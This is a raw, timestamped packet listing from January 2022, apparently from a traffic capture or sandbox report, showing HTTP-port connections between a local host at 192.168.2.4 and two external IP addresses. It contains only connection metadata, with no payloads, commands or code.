Jan 14, 2022 00:16:09.586416960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.586493015 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.586571932 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.586713076 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.586760044 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.586858034 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.586935043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.587053061 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.587135077 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.587219000 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.587300062 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.587382078 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.587486982 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.587583065 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.587661028 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.587768078 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.587894917 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.587918997 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.588013887 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.597450972 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.597678900 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.597801924 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.598139048 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.598288059 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.598484039 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.598623991 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.598746061 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.599078894 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.599246979 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.599332094 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.599546909 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.599668026 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.599679947 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.599865913 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.599879026 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.606467009 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.606601000 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.606781960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.606946945 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.607145071 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.607240915 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.607425928 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.607599974 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.607917070 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.608151913 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.608242989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.608438969 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.608536005 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.608683109 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.608846903 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.608864069 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.609008074 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.609028101 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.609213114 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.609230042 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.609391928 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.609410048 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.609579086 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.609594107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.609658957 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.609793901 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.609859943 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.610012054 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.610081911 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.610166073 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.610337973 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.610354900 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.610441923 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.610613108 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.610629082 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.610789061 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.610806942 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.610932112 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.610975981 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.611154079 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.611170053 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.611327887 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.611345053 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.611510992 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.611526012 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.611608028 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.611715078 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.611793041 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.611912966 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.611965895 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.612152100 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.612168074 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.612247944 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.612442017 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.612458944 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.612530947 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.612710953 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.612724066 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.612886906 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.612899065 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.613033056 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.613080025 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.613166094 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.613343954 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.613358021 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.613523006 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.613534927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.613624096 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.613807917 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.613821030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.613892078 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.614064932 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.614088058 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.614244938 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.614259005 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.614428043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.614447117 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.614531994 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.614695072 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.614708900 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.614969015 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.615151882 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.615396023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.621294975 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.621356010 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.621846914 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.622006893 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.622185946 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.622293949 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.622502089 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.630629063 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.630686045 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.630705118 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.630723000 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.630747080 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.630769014 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.630788088 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.630788088 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.630808115 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.630820990 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.630826950 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.630846024 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.630846977 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.630867004 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.630881071 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.630886078 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.630902052 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.630904913 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.630924940 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.630944014 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.630949974 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.630963087 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.630983114 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.630991936 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.631009102 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.631025076 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.631033897 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.631051064 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.631087065 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.631114960 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.631153107 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.631171942 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.631190062 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.631233931 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.631258965 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.631278992 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.631298065 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.631315947 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.631329060 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.631335020 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.631356001 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.631372929 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.631385088 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.631401062 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.631417990 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.631433964 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.631438017 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.631474972 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.631486893 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.631514072 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.631531954 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.631551027 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.631570101 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.631588936 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.631599903 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.631608009 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.631627083 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.631644964 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.631648064 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.631663084 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.631673098 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.631681919 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.631684065 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.631701946 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.631721020 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.631732941 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.631740093 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.631761074 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.631778955 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.631783962 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.631819963 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.631855965 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.632153988 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.632311106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.632364988 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.632555962 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.633280039 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.633297920 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.633474112 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.633487940 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.633675098 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.633692980 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.633891106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.633908033 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.633995056 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.634176016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.634191036 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.634361029 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.634377003 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.634535074 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.634548903 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.634718895 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.634736061 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.634861946 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.634949923 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.634994984 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.635171890 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.635189056 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.635277033 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.635360956 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.635538101 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.635554075 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.635716915 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.635734081 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.635905981 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.635917902 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.636080980 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.636099100 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.636267900 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.636282921 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.636435032 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.636450052 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.636636019 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.636650085 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.636816978 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.636832952 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.636992931 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.637007952 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.637175083 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.637190104 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.637356997 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.637371063 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.637542009 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.637557030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.637716055 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.637731075 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.637897968 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.637913942 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.638078928 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.638098001 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.638258934 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.638273954 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.638345003 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.638523102 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.638539076 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.638698101 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.638714075 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.638876915 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.638891935 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.639050961 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.639065981 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.639238119 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.639254093 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.639375925 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.639513016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.639528036 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.639692068 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.639708042 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.639806986 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.639955997 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.639971972 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.640134096 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.640145063 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.640324116 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.640340090 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.640431881 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.640535116 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.640655041 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.640758038 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.640845060 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.641047955 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.641064882 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.641161919 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.641238928 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.641439915 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.641462088 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.641648054 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.641664028 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.641841888 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.641855001 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.641994953 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.642158031 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.642185926 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.642404079 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.642421007 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.642601967 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.642616034 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.649169922 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.649225950 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.649465084 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.649765968 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.649780989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.649972916 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.649987936 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.650078058 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.650268078 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.650285006 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.651933908 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.652157068 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.652416945 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.652431011 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.652618885 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.652627945 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.652729988 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.652915955 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.652930975 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.653043032 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.653213024 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.653234959 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.653513908 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.653531075 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.653691053 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.653702974 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.653872967 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.653887987 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.653949976 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.654072046 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.654092073 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.654205084 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.654258013 CET	80	49910	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.654365063 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.654500961 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.654503107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.654710054 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.654725075 CET	49902	80	192.168.2.4	185.215.113.35
